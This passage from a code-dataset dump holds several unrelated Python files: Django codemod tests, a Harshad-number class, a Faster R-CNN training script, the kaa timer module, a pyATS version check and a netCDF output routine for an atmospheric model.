TestUNGetTextToNGetTextTransformer(BaseVisitorTest):\n\n transformer = UNGetTextToNGetTextTransformer\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.translation import ungettext\n\n result = ungettext(content, plural_content, count)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import ngettext\n\n result = ngettext(content, plural_content, count)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestUNGetTextLazyToNGetTextLazyTransformer(BaseVisitorTest):\n\n transformer = UNGetTextLazyToNGetTextLazyTransformer\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.translation import ungettext_lazy\n\n result = ungettext_lazy(content, plural_content, count)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import ngettext_lazy\n\n result = ngettext_lazy(content, plural_content, 
count)\n        \"\"\"\n        self.assertCodemod(before, after)\n\n    def test_import_as_alias(self) -> None:\n        \"\"\"Check with a common import alias.\"\"\"\n        before = \"\"\"\n            from django.utils.translation import ungettext_lazy as _\n\n            result = _(content, plural_content, count)\n        \"\"\"\n        after = \"\"\"\n            from django.utils.translation import ngettext_lazy as _\n\n            result = _(content, plural_content, count)\n        \"\"\"\n        self.assertCodemod(before, after)\n\n\nclass TestURLToRePathTransformer(BaseVisitorTest):\n\n    transformer = URLToRePathTransformer\n\n    def test_noop(self) -> None:\n        \"\"\"Test when nothing should change.\"\"\"\n        before = \"\"\"\n            from django.urls import include, re_path\n\n            urlpatterns = [\n                re_path(r'^index/$', views.index, name='index'),\n                re_path(r'^weblog/', include('blog.urls')),\n            ]\n        \"\"\"\n        after = \"\"\"\n            from django.urls import include, re_path\n\n            urlpatterns = [\n                re_path(r'^index/$', views.index, name='index'),\n                re_path(r'^weblog/', include('blog.urls')),\n            ]\n        \"\"\"\n\n        self.assertCodemod(before, after)\n\n    def test_simple_substitution(self) -> None:\n        \"\"\"Check simple use case.\"\"\"\n        before = \"\"\"\n            from django.urls import include\n            from django.conf.urls import url\n\n            urlpatterns = [\n                url(r'^index/$', views.index, name='index'),\n                url(r'^weblog/', include('blog.urls')),\n            ]\n        \"\"\"\n        after = \"\"\"\n            from django.urls import re_path, include\n\n            urlpatterns = [\n                re_path(r'^index/$', views.index, name='index'),\n                re_path(r'^weblog/', include('blog.urls')),\n            ]\n        \"\"\"\n        self.assertCodemod(before, after)\n","sub_path":"tests/visitors/test_django_40.py","file_name":"test_django_40.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"7843152","text":"class Harshad:\n\n    @staticmethod\n    def is_valid(number):\n        sum_digits = sum([int(s) for s in str(number)])\n        return bool(not number % sum_digits)\n\n    @staticmethod\n    def get_next(number):\n        result = number + 1\n        while Harshad.is_valid(result) is False:\n            result += 1\n        return result\n\n    @staticmethod\n    def get_series(count, start=0):\n        result = []\n        c = 0\n        while c < count:\n            nxt = Harshad.get_next(start)\n            result.append(Harshad.get_next(start))\n            c += 1\n            start = nxt\n        return result\n","sub_path":"tasks/harshad_numbers/src/harshad_numbers.py","file_name":"harshad_numbers.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"88872826","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2018/10/29 10:38\n\n@author: royce.mao\n\nFaster_rcnn stage 2: based on the shared feature map and the RoIs generated and mapped by the RPN, set up per-class classification and background-excluded box regression.\n\"\"\"\nfrom __future__ import division\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.layers import TimeDistributed, Dense, Flatten, Input\nfrom nms import nms\nfrom voc_data import voc_final\nfrom rpn_train import regr_revise, resnet50_rpn, predict\nfrom RoiPoolingConv import RoiPoolingConv\nfrom frcnn_loss import class_loss_cls, class_loss_regr\nfrom roi_pooling import cls_target, regr_target, proposal_to_roi\nfrom anchor import anchors_generation, sliding_anchors_all, pos_neg_iou\nfrom net_layers import resnet50, roi_pooling_layer, fast_rcnn_layer\nfrom keras.utils import plot_model\nimport numpy as np\nimport time\n\ndef res_roi_frcnn(max_boxes, pooling_size, nb_classes):\n    \"\"\"\n    Stage 2: the resnet50 base feature-extraction network + the RoI pooling conv structure (feature mapping) + cls_layer and regr_layer\n    :param rois_map: RoIs on the feature map, generated by the RPN network\n    :param cls_target: classification targets\n    :param regr_target: regression targets\n    :param num_rois: number of RoIs per batch image\n    :return: \n    \"\"\"\n    # The inputs cover two things: 1) the feature map; 2) the RoIs\n    input_rois = Input(shape=(max_boxes, 4)) # rois input\n    input_shape = (max_boxes, 14, 14, 1024)\n    # resnet50 feature map, downsampled 16x\n    input_tensor, base_layer = resnet50() # feature_map input (original image size; becomes feature-map size after the resnet50 base network)\n    # Combine the feature map with the RoIs mapped onto it and do roi_pooling\n    out_roi_pool = RoiPoolingConv(pooling_size, max_boxes)([base_layer, input_rois])\n    ## outputs sub feature maps of shape (None, num_rois, 14, 14, 1024)\n    out_fast_rcnn = fast_rcnn_layer(out_roi_pool, input_shape=input_shape, trainable=True)\n    ## outputs a sub feature map of shape (None, num_rois, 1, 1, 2048)\n    # The num_rois sub feature maps are processed separately, so wrap with TimeDistributed\n    out = TimeDistributed(Flatten())(out_fast_rcnn)\n    # Final branches: likewise wrap Dense in TimeDistributed to get an independent fully connected layer per time step\n    out_cls = TimeDistributed(Dense(nb_classes, activation='softmax', kernel_initializer='zero'),\n                name='dense_class_{}'.format(nb_classes))(out)\n    ## (nb_classes-1) leaves out the 'bg' background class\n    out_regr = TimeDistributed(Dense(4 * (nb_classes - 1), activation='linear', kernel_initializer='zero'),\n                name='dense_regress_{}'.format(nb_classes))(out)\n    model = Model(inputs=[input_tensor, input_rois], outputs=[out_cls, out_regr], name='cls_regr_layer')\n    # model.summary()\n    return model\n\n\ndef gen_data_frcnn(model_rpn, all_images, all_annotations, batch_size=1):\n    \"\"\"\n    Generator (iterator) used by fit_generator to produce training data while training\n    :param all_anchors: \n    :param all_images: \n    :param all_annotations: \n    :param batch_size: \n    :return: \n    \"\"\"\n    # Generate the parameters needed for training one batch at a time\n    length = len(all_images)\n    while True:\n        for i in np.random.randint(0, length, size=batch_size):\n            # RPN model prediction\n            predict_imgs = predict(model_rpn, np.array(all_images[i][np.newaxis, :, :]))\n            dx = predict_imgs[1].reshape(1, 1764, 4)[:, :, 0] # 1764=14*14*9\n            dy = predict_imgs[1].reshape(1, 1764, 4)[:, :, 1]\n            dw = predict_imgs[1].reshape(1, 1764, 4)[:, :, 2]\n            dh = predict_imgs[1].reshape(1, 1764, 4)[:, :, 3]\n            all_proposals = regr_revise(all_anchors, dx, dy, dw, dh)\n            # Generate proposals\n            proposals, probs = nms(np.column_stack((all_proposals, predict_imgs[0].ravel())), thresh=0.9,\n                      max_boxes=max_boxes)\n            # print(type(np.array((all_annotations[i]))[0]))\n            rois_pic, cls, pos_index, max_index = cls_target(proposals, np.array((all_annotations[i])),\n                          classifier_min_overlap=0.1, classifier_max_overlap=0.5)\n            shift = regr_target(rois_pic, np.array((all_annotations[i])), pos_index, max_index)\n            rois_map = proposal_to_roi(rois_pic, stride)\n            # Features: two inputs, the image and the RoIs\n            x = [all_images[i][np.newaxis, :, :], rois_map[np.newaxis, :, :]] # [1, num_rois, 4]\n            # Labels: two outputs, cls and regr\n            # y = [np.array((cls))[np.newaxis, :][:, :, np.newaxis], revise[np.newaxis, :, :]] # [1, num_rois, 20], [1, num_rois, 80]\n            # Convert y into the y_true labels used for computing the losses\n            ## y1 classification target (the 3rd dimension has nb_classes columns)\n            y1 = np.zeros((max_boxes, nb_classes))\n            for i in range(max_boxes):\n                '''\n                if cls[i] == 0.0:\n                    y1[i] = [0, 0, 1]\n                '''\n                if cls[i] != 0.0:\n                    a = np.zeros(nb_classes)\n                    a[class_mapping[cls[i]]] = 1\n                    y1[i] = a\n            ## y2 regression target (along dim 3, the first 4*(nb_classes-1) columns repeat the y1 classes to mark positive samples; the last 4*(nb_classes-1) columns hold the true regression targets of those positives)\n            y2_true = np.zeros((max_boxes, 4*(nb_classes-1)))\n            j = 0\n            for i in range(max_boxes):\n                if cls[i] in class_mapping.keys() and cls[i] != 'bg':\n                    a = np.zeros(4*(nb_classes-1))\n                    a[4*class_mapping[cls[i]] : 4*class_mapping[cls[i]]+4] = shift[j]\n                    y2_true[i] = a\n                    j += 1\n            y2 = np.concatenate([np.repeat(y1[np.newaxis, :, :][:, :, :(nb_classes-1)], 4, axis=2), y2_true[np.newaxis, :, :]], axis=2)\n            y = [y1[np.newaxis, :, :], y2]\n            yield x, y\n\n\ndef train(model_rpn, max_boxes, pooling_size, nb_classes):\n    \"\"\"\n    Training procedure\n    :param input_tensor: \n    :param rois_map: \n    :param out_cls: \n    :param out_regr: \n    :param nb_classes: \n    :return: \n    \"\"\"\n    # [predict must be called once inside train(); calling it directly from the generator raises an error???]\n    predict(model_rpn, np.array(all_images[0][np.newaxis, :, :]))\n    model_fastrcnn = res_roi_frcnn(max_boxes, pooling_size, nb_classes)\n    plot_model(model_fastrcnn, to_file='F:\\\\VOC2007\\\\model_fast_rcnn.png')\n    try:\n        print('loading weights from {}'.format('resnet50_weights_tf_dim_ordering_tf_kernels.h5'))\n        model_fastrcnn.load_weights('F:\\\\VOC2007\\\\resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5', by_name=True)\n        print('Loaded pretrained weights successfully!')\n    except:\n        print('Failed to load pretrained weights!')\n    adam = Adam(lr=1e-5)\n    model_fastrcnn.compile(optimizer=adam,\n              loss=[class_loss_cls, class_loss_regr(nb_classes - 1)],\n              metrics={'dense_class_{}'.format(nb_classes): 'accuracy'})\n    print(\"[INFO] Stage-2 network Fast_rcnn starting training........\")\n    history = model_fastrcnn.fit_generator(\n        generator=gen_data_frcnn(model_rpn, all_images, all_annotations, batch_size=1),\n        steps_per_epoch=1,\n        epochs=25)\n    return model_fastrcnn\n\n\nif __name__ == \"__main__\":\n    # New parameters\n    nb_classes = None # total number of classes\n    max_boxes = 7 # number of RoIs kept by NMS per image [more than 7 raises an error???]\n    pooling_size = 14 # pooling size\n    # Prepare the VOC ground-truth annotation dataset\n    data_path = \"F:\\\\VOC2007\"\n    width = 14\n    height = 14\n    stride = [16, 16]\n    class_mapping, classes_count, all_images, all_annotations = voc_final(data_path)\n    nb_classes = len(class_mapping) + 1 # set the class count, adding the 'bg' class\n    class_mapping['bg'] = len(class_mapping) # add the 'bg' class to the class_mapping dict\n    # Generate all anchors mapped back onto the original image\n    anchors = anchors_generation()\n    all_anchors = sliding_anchors_all([width, height], stride, anchors)\n    # Load the trained RPN model weights\n    model_rpn = resnet50_rpn(9)\n    model_rpn.load_weights('F:\\\\VOC2007\\\\rpn.hdf5')\n    print('RPN model loaded! (used to generate proposals during training)')\n    # Start training while generating data on the fly\n    start_time = time.time()\n    model_fast_rcnn = train(model_rpn, max_boxes, pooling_size, nb_classes)\n    # model_fast_rcnn.save_weights('F:\\\\VOC2007\\\\fast_rcnn.hdf5')\n    end_time = time.time()\n    print(\"Time elapsed: {} seconds\".format(end_time - start_time))\n","sub_path":"frcnn_train.py","file_name":"frcnn_train.py","file_ext":"py","file_size_in_byte":8591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
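The y2 label layout assembled in gen_data_frcnn above (a 4-fold repeat of the non-background columns of y1, concatenated with the per-class box regression targets) is easier to see on a toy case; the numbers below are invented purely for illustration:

import numpy as np

nb_classes = 3                                       # 2 real classes + 'bg'
y1 = np.array([[0.0, 1.0, 0.0]])                     # one RoI labelled class 1
shift = np.array([0.1, 0.2, 0.3, 0.4])               # its box regression target
mask = np.repeat(y1[:, :nb_classes - 1], 4, axis=1)  # [[0. 0. 0. 0. 1. 1. 1. 1.]]
y2_true = np.zeros((1, 4 * (nb_classes - 1)))
y2_true[0, 4 * 1:4 * 1 + 4] = shift                  # deltas go into the class-1 slot
y2 = np.concatenate([mask, y2_true], axis=1)         # shape (1, 16): mask | targets

+{"seq_id":"256798426","text":"# -*- coding: iso-8859-1 -*-\n# -----------------------------------------------------------------------------\n# timer.py - Timer classes for the main loop\n# -----------------------------------------------------------------------------\n# $Id: timer.py 4070 2009-05-25 15:32:31Z tack $\n#\n# -----------------------------------------------------------------------------\n# kaa.base - The Kaa Application Framework\n# Copyright 2005-2009 Dirk Meyer, Jason Tackaberry, et al.\n#\n# Please see the file AUTHORS for a complete list of authors.\n#\n# This library is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License version\n# 2.1 as published by the Free Software Foundation.\n#\n# This library is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 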
See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA\n# 02110-1301 USA\n#\n# -----------------------------------------------------------------------------\n\n__all__ = [ 'timed', 'Timer', 'WeakTimer', 'OneShotTimer', 'WeakOneShotTimer',\n 'AtTimer', 'OneShotAtTimer', 'POLICY_ONCE', 'POLICY_MANY',\n 'POLICY_RESTART' ]\n\nimport logging\nimport datetime\n\nimport nf_wrapper as notifier\nfrom thread import threaded, MAINTHREAD\nfrom weakref import weakref\nfrom utils import wraps, DecoratorDataStore, property\n\nPOLICY_ONCE = 'once'\nPOLICY_MANY = 'many'\nPOLICY_RESTART = 'restart'\n\n# get logging object\nlog = logging.getLogger('base')\n\n\ndef timed(interval, timer=None, policy=POLICY_MANY):\n \"\"\"\n Decorator to call the decorated function in a Timer. When calling the\n function, a timer will be started with the given interval calling that\n function. The decorated function will be called from the main thread.\n\n The timer parameter optionally specifies which timer class should be\n used to wrap the function. kaa.Timer (default) or kaa.WeakTimer will\n repeatedly invoke the decorated function until it returns False.\n kaa.OneShotTimer or kaa.WeakOneShotTimer will invoke the function once,\n delaying it by the specified interval. (In this case the return value\n of the decorated function is irrelevant.)\n\n The policy parameter controls how multiple invocations of the decorated\n function should be handled. By default (POLICY_MANY), each invocation of\n the function will create a new timer, each firing at the specified\n interval. If policy is POLICY_ONCE, subsequent invocations are ignored\n while the first timer is still active. If the policy is POLICY_RESTART,\n subsequent invocations will restart the first timer.\n\n Note that in the case of POLICY_ONCE or POLICY_RESTART, if the timer is\n currently running, any arguments passed to the decorated function on\n subsequent calls will be discarded.\n \"\"\"\n if not policy in (POLICY_MANY, POLICY_ONCE, POLICY_RESTART):\n raise RuntimeError('Invalid @kaa.timed policy %s' % policy)\n\n def decorator(func):\n @wraps(func)\n def newfunc(*args, **kwargs):\n if policy == POLICY_MANY:\n # just start the timer\n t = (timer or Timer)(func, *args, **kwargs)\n t.start(interval)\n return True\n store = DecoratorDataStore(func, newfunc, args)\n # check current timer\n if 'timer' in store and store.timer and store.timer.active:\n if policy == POLICY_ONCE:\n # timer already running and not override\n return False\n # stop old timer\n store.timer.stop()\n # create new timer, store it in the object and start it\n t = (timer or Timer)(func, *args, **kwargs)\n store.timer = weakref(t)\n t.start(interval)\n return True\n return newfunc\n\n return decorator\n\n\n\nclass Timer(notifier.NotifierCallback):\n \"\"\"\n Invokes the supplied callback after the supplied interval (passed to\n :meth:`~kaa.Timer.start`) elapses. 
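A minimal usage sketch (poll_device is a hypothetical zero-argument\n    callable; assumes the kaa main loop is running):\n\n        t = Timer(poll_device)\n        t.start(0.5)   # invoke poll_device every 0.5 seconds\n        t.stop()       # later: stop it again\n\n    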
The Timer is created stopped.\n\n When the timer interval elapses, we say that the timer is \"fired\" or\n \"triggered,\" at which time the given callback is invoked.\n\n If the callback returns False, then the timer is automatically stopped.\n If it returns any other value (including None), the timer will continue\n to fire.\n \"\"\"\n\n __interval = None\n\n def __init__(self, callback, *args, **kwargs):\n \"\"\"\n :param callback: the callable to be invoked\n :param args: the arguments to be passed to the callable when it's invoked\n :param kwargs: the keyword arguments to be passed to the callable when it's invoked\n \"\"\"\n super(Timer, self).__init__(callback, *args, **kwargs)\n self.restart_when_active = True\n\n\n @threaded(MAINTHREAD)\n def start(self, interval):\n \"\"\"\n Start the timer, invoking the callback every *interval* seconds.\n\n If the timer is already running, it is stopped and restarted with\n the given interval. The timer's precision is at the mercy of other\n tasks running in the main loop. For example, if another task\n (a different timer, or I/O callback) blocks the mainloop for longer\n than the given timer interval, the callback will be invoked late.\n\n :param interval: interval between invocations of the callback, in seconds\n \"\"\"\n if self.active:\n if not self.restart_when_active:\n return\n self.unregister()\n self._id = notifier.timer_add(int(interval * 1000), self)\n self.__interval = interval\n\n\n @property\n def interval(self):\n \"\"\"\n Timer interval when the timer is running, None if not. The interval\n cannot be changed once the timer is started, and it is set via the\n :meth:`~kaa.Timer.start` method.\n \"\"\"\n return self.__interval\n\n\n @threaded(MAINTHREAD)\n def stop(self):\n \"\"\"\n Stop a running timer.\n\n This method can be called safely even if the timer is already stopped.\n \"\"\"\n self.unregister()\n\n\n def unregister(self):\n \"\"\"\n Removes the timer from the notifier.\n\n This is considered an internal function (required to be implemented by\n subclasses of NotifierCallback). User should use stop() instead.\n \"\"\"\n if self.active:\n notifier.timer_remove(self._id)\n super(Timer, self).unregister()\n self.__interval = None\n\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Run the callback. (This is done internally by the notifier; the user will\n generally never do this directly.)\n \"\"\"\n if not self.active:\n # This happens if previous timer that has been called\n # during the same step has stopped us. This should not\n # happen anymore.\n log.error('calling callback on inactive timer (%s)' % repr(self))\n return False\n return super(Timer, self).__call__(*args, **kwargs)\n\n\nclass WeakTimer(notifier.WeakNotifierCallback, Timer):\n \"\"\"\n Weak variant of the Timer class.\n\n All references to the callback and supplied args/kwargs are weak\n references. When any of the underlying objects are deleted,\n the WeakTimer is automatically stopped.\n \"\"\"\n pass\n\n\nclass OneShotTimer(Timer):\n \"\"\"\n A Timer that gets triggered exactly once when it is started. 
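For example (a sketch; save_state is a hypothetical callable):\n\n        OneShotTimer(save_state).start(10)   # run save_state once, 10 seconds from now\n\n    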
Useful\n    for deferred one-off tasks.\n\n    Gotcha: it is possible to restart a OneShotTimer from inside the\n    callback it invokes; however, be careful not to return False in this\n    case, otherwise the freshly started OneShotTimer will be implicitly\n    stopped before it gets a chance to fire.\n    \"\"\"\n    def __call__(self, *args, **kwargs):\n        self.unregister()\n        super(Timer, self).__call__(*args, **kwargs)\n        return False\n\n\nclass WeakOneShotTimer(notifier.WeakNotifierCallback, OneShotTimer):\n    \"\"\"\n    Weak variant of the OneShotTimer class.\n\n    All references to the callback and supplied args/kwargs are weak\n    references. When any of the underlying objects are deleted,\n    the WeakOneShotTimer is automatically stopped.\n    \"\"\"\n    pass\n\n\nclass OneShotAtTimer(OneShotTimer):\n    \"\"\"\n    A timer that is triggered at a specific time of day. Once the timer fires\n    it is stopped.\n    \"\"\"\n    def start(self, hour=range(24), min=range(60), sec=0):\n        \"\"\"\n        Starts the timer, causing it to be fired at the specified time.\n\n        By default, the timer will fire every minute at 0 seconds. The timer\n        has second precision.\n\n        :param hour: the hour number (0-23) or list of hours\n        :type hour: int or list of ints\n        :param min: the minute number (0-59) or list of minutes\n        :type min: int or list of ints\n        :param sec: the second number (0-59) or list of seconds\n        :type sec: int or list of ints\n        \"\"\"\n        if not isinstance(hour, (list, tuple)):\n            hour = [ hour ]\n        if not isinstance(min, (list, tuple)):\n            min = [ min ]\n        if not isinstance(sec, (list, tuple)):\n            sec = [ sec ]\n\n        self._timings = hour, min, sec\n        self._last_time = datetime.datetime.now()\n        self._schedule_next()\n\n\n    def _schedule_next(self):\n        \"\"\"\n        Internal function to calculate the next callback time and\n        schedule it.\n        \"\"\"\n        hour, min, sec = self._timings\n        now = datetime.datetime.now()\n        # Take the later of now or the last scheduled time for purposes of\n        # determining the next time. 
If we use the current system time\n # instead, we may end up firing a callback twice for a given time,\n # because due to imprecision we may end up here slightly before (a few\n # milliseconds) the scheduled time.\n t = max(self._last_time, now).replace(microsecond = 0)\n\n next_sec = [ x for x in sec if t.second < x ]\n next_min = [ x for x in min if t.minute < x ]\n next_hour = [ x for x in hour if t.hour < x ]\n\n if next_sec:\n next = t.replace(second = next_sec[0])\n elif next_min:\n next = t.replace(minute = next_min[0], second = sec[0])\n elif next_hour:\n next = t.replace(hour = next_hour[0], minute = min[0], second = sec[0])\n else:\n tmrw = t + datetime.timedelta(days = 1)\n next = tmrw.replace(hour = hour[0], minute = min[0], second = sec[0])\n\n delta = next - now\n super(OneShotAtTimer, self).start(delta.seconds + delta.microseconds / 1000000.0)\n self._last_time = next\n\n\nclass AtTimer(OneShotAtTimer):\n \"\"\"\n A timer that is triggered at a specific time or times of day.\n \"\"\"\n def __call__(self, *args, **kwargs):\n if super(Timer, self).__call__(*args, **kwargs) != False:\n self._schedule_next()\n","sub_path":"env/lib/python2.7/site-packages/kaa/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":11203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"390823346","text":"# import the aetest module\nfrom pyats import aetest\nimport logging\nimport os\n\nlogger = logging.getLogger(__name__)\n\nclass CommonSetup(aetest.CommonSetup):\n \n @aetest.subsection\n def connect_to_devices(self, testbed):\n \n for device in testbed:\n # don't do the default show version\n # don't do the default config\n device.connect(init_exec_commands=[],\n init_config_commands=[],\n log_stdout=False)\n \n logger.info('{device} connected'.format(device=device.alias))\n\nclass CheckVersion(aetest.Testcase):\n\n @aetest.test\n def check_current_version(self, testbed):\n\n # Local vars\n test_success = True\n xe_version = '16.9.3'\n xr_version = '6.5.3'\n fail_devices = []\n\n for device in testbed:\n \n #Learning platform information\n platform = device.learn('platform')\n\n # We use .lower() so we're not case sensitive\n if (platform.os.lower() == 'iosxe' and platform.version != xe_version): \n test_success = False\n fail_devices.append(device.alias)\n\n # We use .lower() so we're not case sensitive\n if (platform.os.lower() == 'iosxr' and platform.version != xr_version): \n test_success = False\n fail_devices.append(device.alias)\n\n logger.debug('{device} running {platformos} has OS: {os}'.format(device=device.alias, platformos=platform.os, os=platform.version))\n\n # If we have devices with the wrong OS, print their names\n assert test_success == True, 'List of fail devices: {list}'.format(list=fail_devices)\n\nclass CommonCleanup(aetest.CommonCleanup):\n\n @aetest.subsection\n def disconnect_from_devices(self, testbed):\n \n for device in testbed:\n device.disconnect()\n\nif __name__ == '__main__':\n\n # local imports\n from genie.testbed import load\n import sys\n\n # set debug level DEBUG, INFO, WARNING\n logger.setLevel(logging.INFO)\n\n # Loading device information\n cwd = os.path.dirname(__file__)\n\n # If the python script is executed from the local directory, use local testbed\n if cwd == '': testbed = load(f'./testbed.yaml')\n # Else, the python script is executed from another directory, use testbed in the folder of the script\n else: testbed = load(f'{cwd}/testbed.yaml')\n\n aetest.main(testbed = 
testbed)","sub_path":"4_aetest/solution_example/4_aetest.py","file_name":"4_aetest.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"131713822","text":"import numpy as np\nimport time\nfrom netCDF4 import Dataset\nfrom namelist import output_path, output_fields, pTop\nfrom namelist import i_radiation, \\\n i_microphysics, i_surface\nfrom IO_helper_functions import NC_output_diagnostics\n\n\ndef output_to_NC(GR, F, RAD, SURF, MIC):\n\n print('###########################################')\n print('###########################################')\n print('WRITE FIELDS '+str(GR.nc_output_count).zfill(4))\n print('###########################################')\n print('###########################################')\n\n # PREPARATIONS\n ####################################################################\n #VORT, F.PAIR, F.TAIR, WWIND_ms,\\\n VORT, WWIND_ms, WVP, CWP = NC_output_diagnostics(GR, F, F.UWIND, \n F.VWIND, F.WWIND, F.POTT, F.COLP, F.PVTF, F.PVTFVB,\n F.PHI, F.PHIVB, F.RHO, MIC)\n\n # CREATE AND OPEN FILE\n ####################################################################\n filename = output_path+'/out'+str(GR.nc_output_count).zfill(4)+'.nc'\n ncf = Dataset(filename, 'w', format='NETCDF4')\n ncf.close()\n ncf = Dataset(filename, 'a', format='NETCDF4')\n\n # DIMENSIONS\n ####################################################################\n time_dim = ncf.createDimension('time', None)\n bnds_dim = ncf.createDimension('bnds', 1)\n lon_dim = ncf.createDimension('lon', GR.nx)\n lons_dim = ncf.createDimension('lons', GR.nxs)\n lat_dim = ncf.createDimension('lat', GR.ny)\n lats_dim = ncf.createDimension('lats', GR.nys)\n level_dim = ncf.createDimension('level', GR.nz)\n levels_dim = ncf.createDimension('levels', GR.nzs)\n\n # DIMENSION VARIABLES\n ####################################################################\n dtime = ncf.createVariable('time', 'f8', ('time',) )\n bnds = ncf.createVariable('bnds', 'f8', ('bnds',) )\n lon = ncf.createVariable('lon', 'f4', ('lon',) )\n lons = ncf.createVariable('lons', 'f4', ('lons',) )\n lat = ncf.createVariable('lat', 'f4', ('lat',) )\n lats = ncf.createVariable('lats', 'f4', ('lats',) )\n level = ncf.createVariable('level', 'f4', ('level',) )\n levels = ncf.createVariable('levels', 'f4', ('levels',) )\n\n dtime[:] = GR.sim_time_sec/3600/24\n bnds[:] = [0]\n lon[:] = GR.lon_rad[GR.ii,GR.nb+1]\n lons[:] = GR.lonis_rad[GR.iis,GR.nb+1]\n lat[:] = GR.lat_rad[GR.nb+1,GR.jj]\n lats[:] = GR.latjs_rad[GR.nb+1,GR.jjs]\n level[:] = GR.level\n levels[:] = GR.levels\n\n ####################################################################\n ##############################################################################\n # 2D FIELDS\n ##############################################################################\n ####################################################################\n\n # pressure fields\n ##############################################################################\n if output_fields['PSURF']:\n PSURF_out = ncf.createVariable('PSURF', 'f4', ('time', 'lat', 'lon',) )\n PSURF_out[-1,:,:] = F.COLP[GR.iijj].T + pTop\n\n # flux fields\n ##############################################################################\n\n # velocity fields\n ##############################################################################\n\n # temperature fields\n ##############################################################################\n\n # primary diagnostic fields 
(relevant for dynamics)\n ##############################################################################\n\n # secondary diagnostic fields (not relevant for dynamics)\n ##############################################################################\n\n # constant fields\n ##############################################################################\n\n # radiation fields\n ##############################################################################\n\n # microphysics fields\n ##############################################################################\n\n\n\n ####################################################################\n ##############################################################################\n # 3D FIELDS\n ##############################################################################\n ####################################################################\n\n\n\n # pressure fields\n ##############################################################################\n\n # flux fields\n ##############################################################################\n \n # velocity fields\n ##############################################################################\n if output_fields['UWIND']:\n UWIND_out = ncf.createVariable('UWIND', 'f4', ('time', 'level', 'lat', 'lons',) )\n UWIND_out[-1,:,:,:] = F.UWIND[:,:,:][GR.iisjj].T\n if output_fields['VWIND']:\n VWIND_out = ncf.createVariable('VWIND', 'f4', ('time', 'level', 'lats', 'lon',) )\n VWIND_out[-1,:,:,:] = F.VWIND[:,:,:][GR.iijjs].T\n if output_fields['WIND']:\n WIND_out = ncf.createVariable('WIND', 'f4', ('time', 'level', 'lat', 'lon',) )\n WIND_out[-1,:,:,:] = F.WIND[:,:,:][GR.iijj].T\n if output_fields['WWIND']:\n WWIND_out = ncf.createVariable('WWIND', 'f4', ('time', 'levels', 'lat', 'lon',) )\n for ks in range(0,GR.nzs):\n WWIND_out[-1,ks,:,:] = (F.WWIND[:,:,ks][GR.iijj]*F.COLP[GR.iijj]).T\n #WWIND_out[-1,ks,:,:] = WWIND_ms[:,:,ks][GR.iijj].T\n if output_fields['VORT']:\n VORT_out = ncf.createVariable('VORT', 'f4', ('time', 'level', 'lat', 'lon',) )\n VORT_out[-1,:,:,:] = VORT[:,:,:][GR.iijj].T\n\n # temperature fields\n ##############################################################################\n if output_fields['POTT']:\n POTT_out = ncf.createVariable('POTT', 'f4', ('time', 'level', 'lat', 'lon',) )\n POTT_out[-1,:,:,:] = F.POTT[:,:,:][GR.iijj].T\n if output_fields['TAIR']:\n TAIR_out = ncf.createVariable('TAIR', 'f4', ('time', 'level', 'lat', 'lon',) )\n TAIR_out[-1,:,:,:] = F.TAIR[:,:,:][GR.iijj].T\n\n # primary diagnostic fields (relevant for dynamics)\n ##############################################################################\n if output_fields['PHI']:\n PHI_out = ncf.createVariable('PHI', 'f4', ('time', 'level', 'lat', 'lon',) )\n PHI_out[-1,:,:,:] = F.PHI[:,:,:][GR.iijj].T\n\n # secondary diagnostic fields (not relevant for dynamics)\n ##############################################################################\n if output_fields['PAIR']:\n PAIR_out = ncf.createVariable('PAIR', 'f4', ('time', 'level', 'lat', 'lon',) )\n PAIR_out[-1,:,:,:] = F.PAIR[:,:,:][GR.iijj].T\n if output_fields['RHO']:\n RHO_out = ncf.createVariable('RHO', 'f4', ('time', 'level', 'lat', 'lon',) )\n RHO_out[-1,:,:,:] = F.RHO[:,:,:][GR.iijj].T\n\n # constant fields\n ##############################################################################\n\n # radiation fields\n ##############################################################################\n\n # microphysics fields\n 
